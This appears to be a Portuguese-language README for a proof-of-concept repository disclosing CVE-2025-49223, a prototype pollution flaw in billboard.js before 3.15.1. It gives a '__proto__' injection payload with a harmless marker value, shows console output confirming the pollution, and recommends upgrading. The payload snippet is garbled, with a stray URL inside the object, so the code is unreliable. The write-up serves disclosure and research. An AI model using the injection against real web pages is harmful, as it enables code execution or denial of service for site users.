
CVE-2025-49223 - Poluição de Protótipo no Billboard.js
Descobriu-se que o billboard.js anterior à versão 3.15.1 contém uma vulnerabilidade de prototype pollution por meio da função
generate, o que poderia permitir que atacantes executassem código arbitrário ou causassem uma Negação de Serviço (DoS) ao injetar propriedades arbitrárias.
Este repositório demonstra uma vulnerabilidade de Prototype Pollution encontrada no billboard.js em versões anteriores à 3.15.1, divulgada como CVE-2025-49223.
<= 3.14.0>= 3.15.1Abra o index.html em um navegador e verifique o log do console em busca de tentativas de prototype pollution.
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/billboard.pkgd.min.js"></script>
{
["__proto__"]: https://raw.githubusercontent.com/louay-075/cve-2025-49223-billboardjs-poc/HEAD/%7B
polluted: "polluted_via_string_key"
}
}
🔥 string key '__proto__' -> POLLUTED! Value: polluted_via_string_key
Isso confirma que um atacante pode poluir o Object.prototype, afetando qualquer objeto futuro criado na página.
A exploração bem-sucedida pode levar a:
billboard.js para a versão 3.15.1 ou posterior⚠️ Aviso Legal: Esta PoC é apenas para fins educacionais e de pesquisa. Use com responsabilidade.